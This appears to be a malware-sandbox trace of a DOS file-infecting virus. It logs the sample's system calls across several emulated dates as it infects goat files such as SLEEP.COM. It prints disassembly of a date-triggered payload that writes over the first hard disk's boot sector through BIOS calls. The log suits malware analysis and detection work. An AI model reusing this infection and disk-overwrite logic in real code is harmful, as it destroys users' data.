2018-12-25T11:52:05.474869191Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.481145644Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.490906723Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.493662137Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.496589646Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.502513761Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.513170044Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.519830617Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.521323509Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.528079942Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.54034104Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.542028558Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.545292868Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.551056045Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.561189592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.567763313Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.569442203Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.575802424Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.586052061Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.588014143Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.590445625Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.60108457Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.61127861Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.617846495Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.619459717Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.626839005Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.634011578Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.635752274Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.639272908Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.644652665Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.656301997Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.668417284Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.669891482Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.676501289Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.686631421Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.688464437Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.691248395Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.698344558Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.707789525Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.714314392Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.716444922Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.722713689Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.735222207Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.737575491Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.740168668Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:05.752519381Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:05.762459378Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:05.771157586Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:05.772711294Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:05.778387606Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:05.779768454Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:05.782102276Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:05.784460252Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:05.786400371Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:05.793352516Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:05.795304708Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:05.803453808Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:05.80473612Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:05.807947487Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:05.809158402Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:05.810509618Z 62 PC: 1448c | Close file
2018-12-25T11:52:05.81849475Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:05.824618685Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:05.829085866Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:05.831225582Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:05.833453838Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:05.838624493Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:05.840247138Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:05.846488798Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:05.848088755Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:05.852607873Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.798175992Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.800287414Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.802547477Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:07.80464964Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:07.807384534Z 78 PC: 14390 | Find first file
2018-12-25T11:52:07.81384488Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:07.819756646Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:07.837432901Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:07.845091213Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:07.846547011Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:07.853576237Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:07.865809506Z 62 PC: 143b9 | Close file
2018-12-25T11:52:07.867685793Z 79 PC: 143bd | Find next file
2018-12-25T11:52:07.870538113Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.877699237Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.888606775Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:07.896660759Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:07.898617359Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:07.905645269Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:07.916806139Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:07.919227751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:07.92242022Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.928627234Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.940115931Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:07.947785047Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:07.949443875Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:07.95718896Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:07.968344411Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:07.97038578Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:07.973583763Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:07.98251995Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:07.993383752Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.000635356Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.010422484Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.017225041Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.031783475Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.03430783Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.037124218Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.043384225Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.054729382Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.059951845Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.061547917Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.067370099Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.074591032Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.075934437Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.079202Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.087671379Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.098856099Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.106813955Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.108376905Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.115381149Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.126646065Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.129952969Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.133264035Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.139936385Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.152309995Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.160500308Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.161967434Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.169612917Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.178226735Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.179716667Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.183844465Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.189908057Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.200580865Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.205587183Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.207117513Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.213986978Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.21691793Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.220386448Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.221749797Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.223830071Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.231938239Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.233678834Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.243579323Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.245375041Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.248515701Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.250386101Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.252111432Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.260489307Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.271236426Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.276646798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.277800253Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.279403997Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.284333279Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.286112701Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.290396729Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.293328791Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.298511129Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.873594507Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.875227373Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.877470458Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.024347674Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.028053251Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.030479402Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.037055005Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.044189915Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.062040979Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.069398169Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.071227133Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.083243571Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.094364284Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.095885687Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.100090376Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.106449303Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.117330862Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.125093572Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.126379098Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.133222073Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.145495608Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.147938398Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.150984871Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.158073641Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.178318248Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.186830703Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.190231025Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.197696025Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.209594015Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.212372174Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.21706361Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.222968114Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.231843755Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.245444027Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.246940997Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.254314571Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.269072616Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.272079448Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.275338482Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.282804059Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.29409253Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.298442605Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.30103119Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.31172254Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.32340646Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.327245712Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.331076692Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.338458505Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.36372952Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.374657737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.376184447Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.383333797Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.395208699Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.397664826Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.40099065Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.409480523Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.420568813Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.428297925Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.431196446Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.440366382Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.451882791Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.45519937Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.458670963Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.465287555Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.476372409Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.485316667Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.487318222Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.496099119Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.499302862Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.504168694Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.506182711Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.508943874Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.516870922Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.519082164Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.530362649Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.532324654Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.535892146Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.537886727Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.540486665Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.549345721Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.559926425Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.566096791Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.567733165Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.571475161Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.580509756Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.58793517Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.597652599Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.600729318Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.605397796Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:07.915793619Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:07.917280054Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:07.919201706Z 9 PC: 14310 | Display string (Could not find end pointer)
2018-12-25T11:52:08.039852546Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.042420918Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.044487815Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.050170149Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.05755749Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.074730253Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.080657952Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.082382895Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.088809106Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.0989265Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.105785931Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.108275983Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.113663812Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.123536883Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.129958298Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.131205988Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.138542713Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.148094081Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.149689657Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.152492374Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.157831897Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.167627427Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.173970737Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.175733818Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.185655299Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.195253526Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.197200764Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.199670738Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.205122552Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.2146295Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.225760616Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.227761801Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.234586982Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.244560923Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.246199573Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.248846127Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.254276635Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.274896517Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.289058329Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.29069808Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.297141342Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.309943482Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.311913621Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.316110258Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.322309111Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.332003592Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.338665389Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.341188284Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.347481489Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.358861537Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.361584367Z 79 PC: 143bd | Find next file (See above)
